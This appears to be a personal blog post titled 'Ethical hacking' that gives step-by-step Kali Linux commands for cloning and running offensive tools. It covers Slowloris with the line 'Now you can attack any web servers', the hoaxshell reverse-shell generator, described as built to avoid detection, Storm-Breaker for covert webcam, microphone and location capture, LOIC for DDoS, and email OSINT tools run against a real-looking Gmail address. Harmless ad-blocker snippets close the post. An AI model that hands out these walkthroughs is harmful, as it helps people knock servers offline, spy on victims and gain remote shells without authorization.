Ethical hacking

                       ETHICAL HAKING TIPS

Tips 1)  learn all programming languages such as :-        JAVA,RUBY,PERL,PYTHON,C,C++,HTML,CSS,JAVASCRIPT,ASSEMBLY LANGUAGE,ETC....

Tips 2)  learn some important books such as :-
FUNDAMENTAL OF COMPUTER,NETWORK, ETC...

Tips 3)  learn DBMS(SQL,MYSQL)

Tips 4)  learn DS

Tips 5) learn Some operating systems such as :- Windows,Mac/Os,android,Linux,etc.....

Start hacking


# https://pkg.kali.org/pkg/autopsy

Isse kali linux ke all tools ka information ka pata chalta hai. 

# emailharvester tools :- emailharvester 

This package contains EmailHarvester, a tool to retrieve Domain email addresses from Search Engines. Features:

Retrieve Domain email addresses from popular Search engines (Google, Bing, Yahoo, ASK, Baidu, Dogpile, Exalead)

Export results to txt and xml files

Limit search results

Define your own User-Agent string

Use proxy server

Plugins system

Search in popular web sites using Search engines (Twitter, LinkedIn, Google+, Github, Instagram, Reddit, Youtube)


# MOSINT – OSINT Tool for Emails in Kali Linux

MOSINT is a free and open-source tool available on GitHub. This tool is free means you can download and use this tool free of cost. MOSINT is used for reconnaissance on email addresses. MOSINT is used for information gathering of the target email. This tool helps you gather information about the target email. This tool is written in python language which means you must have python installed in your system in order to use the tool. MOSINT has different modules that perform different works in order to perform reconnaissance on email addresses. This includes Verification Service { Check if email exist }, Find related domains, Check data breaches, Check social accounts with Socialscan, Scan Pastebin Dumps, DNS Lookup. 

Step 1 :- Open terminal and type cd downloads  and press enter

Step 2:- type pip3 install tabula 

Step 3:- Now you have to install the tool from *Certified Ethical hacker Deepak Thakur github*

git clone https://github.com/alpkeskin/mosint.git

 *CERTIFIED ETHICAL HACKER DEEPAK THAKUR*

Step 4:- cd mosint/

Step 5:- pip3 install -r requirements.txt

Step 6:- type ls and 

 Configure this tool

Step 7:- Now you have to edit the config.json file.

https://verify-email.org/

https://hunter.io/

https://leak-lookup.com/

Step 8:- After saving the file

Done πŸ‘

Now you can run the tool.

For example:- python3 mosint.py -e chaudharysarita5454@gmail.com

Now enjoy πŸ˜‡

Created by *CERTIFIED ETHICAL HACKER DEEPAK THAKUR*

Only used in kali linux


#Slowloris DDOS Attack Tool in Kali Linux

Slowloris is a free and Open source tool available on Github. We can perform a denial of service attack using this tool. It’s a framework written in python. This tool allows a single machine to take down another machine’s web server it uses perfectly legitimate HTTP traffic. It makes a full TCP connection and then requires only a few hundred requests at long-term and regular intervals. As a result, the tool doesn’t need to spend a lot of traffic to exhaust the available connections on a server. 

Uses of Slowloris:-

1)Slowloris sends multiple requests to the target as a result generates heavy traffic botnets.

2)Slowloris can be used to perform DDoS attacks on any webserver.

3)It is an open-source tool, so you can download it from *CERTIFIED ETHICAL HACKER DEEPAK THAKUR**GitHub free of cost.

4)It uses perfectly legitimate HTTP traffic.

A denial of service attack can be executed with the help of Slowloris by generating heavy traffic of botnets.

Installation and step-by-step implementation of Slowloris tool:

Step 1:- Open your Kali Linux and then Open your Terminal.

Step 2:- cd downloads

Step 3:- mkdir Slowloris

Step 4:- Move to the directory that you have to create (Slowloris).

Step 5:- cd Slowloris

Step 6:- type git clone https://github.com/gkbrk/slowloris.git

Step 7:- Now you have to check the IP address of your machine

Type ifconfig

Step 8:- open new terminal and type 

sudo service apache 2 start

Step 9:- after then type 

               ls -l

Step 10:- Now you can attack any web servers

 example:-python3 slowloris .py (Target ip address) -s 500

Done πŸ‘

Enjoy πŸŽ‰πŸŽ‰πŸŽ‰πŸŽ‰πŸŽ‰

**Created by Certified Ethical Hacker Deepak Thakur*


# hoaxshell :- 1)hoaxshell is a Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.

2)This concept (which could possibly be implemented by using protocols other than http or even sockets / pre-installed exes) can be used to establish sessions that promote the illusion of having an actuall shell. 3)Compared to traditional reverse shells this is kind of fake, that's why despite the name of the tool, i like to reffer to such implementations as a hoaxshell.

Uses:- 

Important: 1)As a means of avoiding detection, hoaxshell is automatically generating random values for the session id, URL paths and name of a custom http header utilized in the process, every time the script is started. 

2) The generated payload will work only for the instance it was generated for. 

3)Use the -g option to bypass this behaviour and re-establish an active session or reuse a past generated payload with a new instance of hoaxshell.

Instalation:-

Step 1)open terminal and type cd desktop

Step2)after then type git clone https://github.com/t3l3machus/hoaxshell

*CERTIFIED ETHICAL HACKER DEEPAK THAKUR*

step 3) cd ./hoaxshell

Step 4)sudo pip3 install -r requirements.txt

Step 5)chmod +x hoaxshell.py

Example:- sudo python3 hoaxshell.py -s <your_ip>

Done πŸ‘

Enjoy πŸŽ‰ πŸŽ‰πŸŽ‰πŸŽ‰

*Created by Certified Ethical Hacker Deepak Thakur*


# Zerotier is the most popular tool for access multiple devices

ZeroTier is an encrypted virtual network backbone, allowing multiple machines to communicate as if they were on a single network. The code is all open source, and you can self-host the controller or use the ZeroTierOne service with either free or paid

zerotier.com

https://www.zerotier.com

ZeroTier

Done πŸ‘

Enjoy πŸŽ‰πŸŽ‰πŸŽ‰πŸŽ‰πŸŽ‰πŸŽ‰πŸŽ‰ 

**CREATED BY CERTIFIED ETHICAL HACKER DEEPAK THAKUR*"


# https://developers.redhat.com/rhel8/install-rhel8#

Done πŸ‘

Enjoy πŸŽ‰πŸŽ‰πŸŽ‰πŸŽ‰ πŸŽ‰πŸŽ‰πŸŽ‰

**CREATED BY CERTIFIED ETHICAL HACKER DEEPAK THAKUR**


# NGROK :-

Downloads:- https://ngrok.com/#

(Click sign up button)

ngrok :- Launch your web application using its normal start command, then note the port and whether it’s running on http or https. To start a new tunnel, run:

Step 1 :- open new terminal and type 

Cd desktop

Step 2 :- after then type 

 ./ngrok <protocol> <port>

Example:- http://localhost:8080

Step 3 :- Type ./ngrok http 8080

Step 4 :- The terminal will clear and show the status with two Forwarding http and https addresses, such as http://123456789.ngrok.io/. You can pass either URL to another person so they can access your application from anywhere. The terminal shows a log of requests while ngrok is active.

Step 5 :- pressing Ctrl | Cmd + C in your terminal for quite ngrok server.

Done πŸ‘

Enjoy πŸŽ‰πŸŽ‰πŸŽ‰ ok with me 

CREATED BY CERTIFIED ETHICAL HACKER DEEPAK THAKUR 


#Storm breaker :- Social engineering tool [Access Webcam & Microphone & Location Finder] With Python

Features:

Obtain Device Information Without Any Permission !

Access Location [SMARTPHONES]

Access Webcam

Access Microphone

Installation step by step:-

1)Go to terminal and type 

    cd Desktop/

2)git clone https://github.com/ultrasecurity/Storm-Breaker

3) type ls 

4)cd Storm-Breaker

5)sudo bash install.sh

6)sudo python3 -m pip install -r requirements.txt

7)sudo python3 st.py

DoneπŸ‘πŸ»

*ENJOY WITH CERTIFIED ETHICAL HACKER DEEPAK THAKUR*

πŸ₯³πŸ₯³πŸ₯³πŸ₯³πŸ₯³πŸ₯³


# LOIC (Low orbit ion cannon)

Imperva

 Login

Application Security

Data Security

Network Security

Application Performance


Low Orbit Ion Cannon (LOIC)

Attack Tools

DDoS

What is Low Orbit Ion Cannon (LOIC)

Low Orbit Ion Cannon (LOIC) is a widely available, open-source application developed by Praetox Technologies used for network stress testing, as well as denial of service (DoS) and distributed denial of service (DDoS) attacks. JS LOIC—a JavaScript version of the application—and the web-based Low Orbit Web Cannon have also been released.


DDoS perpetrators use LOIC to flood target systems with junk TCP, UDP and HTTP GET requests. However, a single LOIC user is unable to generate enough requests to significantly impact a target. For an attack to succeed, thousands of users must coordinate and simultaneously direct traffic to the same network.

Download:- 

Step 1 

Open browser and download mono development

Step 2

Open browser and download LOIC exe file

Step 3

Type unzip mono loic.exe

Step 4 

Sudo mono loic.exe

Done


#Ad blocker script

Kali Linux

Ads blocker script 

An ad blocker is a software tool that prevents ads from being displayed on a website or a web page. Ad blockers work by identifying and blocking the code that is responsible for displaying ads on a web page.

There are several ways to implement an ad blocker script. One way is to use a browser extension or plugin that blocks ads on all websites. Another way is to use a server-side script that blocks ads on a specific website or set of websites.

Here is an example of a simple ad blocker script that can be used to block ads on a specific website:

Code :-

<script>

  // Select all ad elements on the page

  var ads = document.querySelectorAll('.ad');

  // Iterate through each ad element and hide it

  for (var i = 0; i < ads.length; i++) {

    ads[i].style.display = 'none';

  }

</script>


This script selects all elements with a class of "ad" and hides them by setting their display property to "none". You can modify the script to select different types of ads or to block ads on a specific set of pages.

Tt's important to note that ad blockers can have unintended consequences, such as breaking certain features on websites or causing them to load slower. Some websites may also block content or restrict access if they detect that an ad blocker is being used.

DoneπŸŽ‰πŸŽ‰πŸŽ‰πŸŽ‰

CREATED BY CERTIFIED ETHICAL HACKER DEEPAK THAKUR 


# ad blocker python code

import requests

from bs4 import BeautifulSoup

# Fetch the web page

r = requests.get("http://example.com")

# Parse the HTML of the page

soup = BeautifulSoup(r.text, "html.parser")

# Find and remove all elements with the "ad" class

for ad in soup.find_all(class_="ad"):

  ad.decompose()

# Find and remove all elements with the "advertising" id

for ad in soup.find_all(id="advertising"):

  ad.decompose()

# Find and remove all script tags

for script in soup.find_all("script"):

  script.decompose()

# Find and remove all iframes

for iframe in soup.find_all("iframe"):

  iframe.decompose()

# Get the modified HTML content

modified_html = str(soup)

# Save the modified HTML to a file

with open("modified.html", "w") as f:

  f.write(modified_html)


DoneπŸ‘πŸŽ‰πŸŽ‰πŸŽ‰πŸŽ‰

CREATED BY CERTIFIED ETHICAL HACKER DEEPAK THAKUR 







Comments

Post a Comment

Popular Posts